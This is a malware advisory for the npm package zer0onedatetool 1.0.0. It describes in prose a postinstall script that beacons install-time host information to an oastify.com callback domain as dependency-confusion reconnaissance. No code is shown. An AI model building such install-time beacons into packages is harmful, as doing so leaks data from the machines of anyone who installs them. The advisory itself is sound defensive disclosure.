zer0onedatetool @1.0.0
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC
OSV ID
MAL-2026-5536
Ecosystem
npm
Summary
The postinstall lifecycle script in this package issues curl POST requests to a subdomain of oastify.com — the out-of-band callback domain operated by Burp Collaborator / Project Discovery's interactsh. On every npm install, the script triggers an outbound HTTP request to an attacker-controlled OOB endpoint, which is the canonical fingerprint of a dependency-confusion / supply-chain reconnaissance payload (verifying the package landed in a victim environment and beaconing identifying host information out). The destination is not associated with any legitimate package functionality. Installer impact: any machine running npm install on this package automatically beacons to the attacker's OOB collector, leaking install-time host metadata and confirming code execution to the attacker.
Source: amazon-inspector (73fd05fda74bbf13c6275d4da0fa80fece821cad03fb2237ae74ed24309eab52)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.